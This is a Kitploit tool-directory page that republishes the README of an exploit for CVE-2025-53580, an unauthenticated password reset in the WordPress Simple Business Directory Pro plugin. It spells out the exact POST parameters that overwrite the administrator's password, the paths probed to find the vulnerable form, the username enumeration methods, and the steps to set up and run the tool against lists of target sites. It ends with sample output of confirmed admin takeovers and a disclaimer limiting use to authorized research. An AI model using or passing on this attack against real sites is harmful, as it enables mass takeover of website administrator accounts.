Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-53580 — WordPress Simple Business Directory Pro Plugin < 15.6.9 is vulnerable to a high priority Privilege Escalation | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-53580
Privilege EscalationReconnaissancePassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubnxploited/cve-2025-53580

CVE-2025-53580

WordPress Simple Business Directory Pro Plugin < 15.6.9 is vulnerable to a high priority Privilege Escalation

44 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

CVE-2025-53580

WordPress Simple Business Directory Pro Plugin < 15.6.9 is vulnerable to a high priority Privilege Escalation

CVE-2025-53580

Simple Business Directory Pro — Incorrect Privilege Assignment → Password Reset → Admin Takeover

root@kitploit:~
   ___  _        ___     __  __  __  ____     ____ ___  ____ __   __
  / (_)(_|   |_// (_)   /  )/  \/  )|        |    /   \|    /  \ /  \
 |       |   |  \__       /|    | / |___     |___   __/|___ \__/|    |
 |       |   |  /   -----/ |    |/      \-----   \    \    \/  \|    |
  \___/   \_/   \___/   /___\__//___\___/    \___/\___/\___/\__/ \__/

CVE Plugin Auth Python Author


❶ Vulnerability

Root Cause:
The plugin exposes a frontend password restore form (qcpd-restore-pwd) that accepts a numeric qcpd-uid (WordPress user ID) and a new pass value. No authentication, token, nonce, or email verification is enforced before the password is changed. Any unauthenticated attacker can reset the password of user ID 1 (typically the site administrator) and any other user by submitting a single POST request, then authenticate with the injected password to gain full admin access.


❷ Attack Flow

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  1. Discover SBD restore page                                   │
│     Probe 24 candidate paths  →  match body containing "sbd"   │
│                                                                 │
│  2. Reset passwords by user ID                                  │
│     POST <restore_url>                                          │
│       qcpd-restore-pwd      = restore                           │
│       qcpd-restore-pwd-type = user                              │
│       qcpd-uid              = 1  (then 2, then 3)              │
│       pass                  = NxploitedNX                       │
│                                                                 │
│  3. Enumerate usernames                                         │
│     /?author=1..9   →  redirect / body parse                    │
│     /wp-json/wp/v2/users  →  slug / username fields            │
│     hostname heuristic  +  "admin" fallback                     │
│                                                                 │
│  4. Login with injected password                                │
│     POST /wp-login.php  log=<user>  pwd=NxploitedNX             │
│     Check: wordpress_logged_in cookie present                   │
│                                                                 │
│  5. Verify admin access (dual method)                           │
│     GET /wp-json/wp/v2/users/me  →  capabilities.manage_options│
│     GET /wp-admin/users.php      →  adminmenu / users table     │
│                                                                 │
│  6. Write confirmed hit → Nx_sbd_login_hits.txt                 │
└─────────────────────────────────────────────────────────────────┘

❸ Setup

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-53580.git
cd CVE-2025-53580
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

❹ Usage

root@kitploit:~
python3 CVE-2025-53580.py

Prompts

root@kitploit:~
Targets list file (one host/URL per line) [list.txt]:   list.txt
Threads (concurrent sites) [3]:                         5
HTTP timeout (seconds) [10]:                            10
Successful hits file [Nx_sbd_login_hits.txt]:           Nx_sbd_login_hits.txt

Password injected for all reset attempts is fixed internally:

root@kitploit:~
NxploitedNX

User IDs targeted per site: 1, 2, 3 (configurable via MAX_USER_ID)


❺ Targets Format — list.txt

root@kitploit:~
https://target1.com
target2.com
http://target3.com

❻ Candidate SBD Pages Probed

The tool scans 24 paths per target looking for a page whose body contains sbd:

root@kitploit:~
/login          /log-in         /signin         /sign-in
/user-login     /account/login  /restore        /password-reset
/reset-password /lost-password  /lostpassword   /user/restore
/my-account     /members/login  /member-login   /customer-login
/wp-login.php   /blog/login     /auth/login     /auth/restore
/sbd-login      /sbd-restore    /blog/log-in    /account/log-in

❼ Username Enumeration


❽ Admin Verification — Dual Method

Every successful login is verified through two independent checks before being written to disk:

Method 1 — REST API:

root@kitploit:~
GET /wp-json/wp/v2/users/me
→ capabilities.manage_options = true  →  ADMIN CONFIRMED

Method 2 — Dashboard:

root@kitploit:~
GET /wp-admin/users.php
→ adminmenu / users table markers present  →  ADMIN CONFIRMED

❾ Output File

Nx_sbd_login_hits.txt

root@kitploit:~
[2025-06-01 14:22:10] https://target.com - type=ADMIN - user=admin
- login=/wp-login.php user=admin pass=NxploitedNX
- detail=ADMIN_CONFIRMED_REST(manage_options)

[2025-06-01 14:23:05] https://target2.com - type=USER - user=editor
- login=/wp-login.php user=editor pass=NxploitedNX
- detail=not_admin(rest_no_manage_options, wpadmin_no_strong_markers)

❿ Terminal Output Sample

root@kitploit:~
[info]  https://target.com :: starting
[ok]    https://target.com :: found front-end sbd page at https://target.com/my-account
[info]  https://target.com :: starting qcpd-uid=1..3 brute with pass=NxploitedNX
[info]  https://target.com :: POST uid=1 → status=302, Location=/my-account/?restored=1
[info]  https://target.com :: POST uid=2 → status=302, Location=/my-account/?restored=1
[info]  https://target.com :: extracting usernames and trying login
[ok]    https://target.com :: login OK for user='admin', checking admin...
[ok]    https://target.com :: HIT for user='admin' → admin=True,
        detail=ADMIN_CONFIRMED_REST(manage_options)

[warn]  https://target2.com :: no sbd page found in candidate restore paths, skipping

⓫ Author

root@kitploit:~
Nxploited (Khaled Alenazi)
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


⓬ Disclaimer

root@kitploit:~
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.

© 2025 Nxploited · Simple Business Directory Pro < 15.6.9 · Fixed in 15.6.9

Download Tool
FieldDetail
CVECVE-2025-53580
Pluginquantumcloud Simple Business Directory Pro (simple-business-directory-pro)
AffectedAll versions < 15.6.9
AuthNone required
TypeIncorrect Privilege Assignment → Unauthenticated Password Reset
CWECWE-266 · Incorrect Privilege Assignment
MethodEndpoint
Author redirect/?author=1 → /?author=9
REST API/wp-json/wp/v2/users → slug + username
Hostname heuristicFirst label of domain
Hardcoded fallbackadmin always included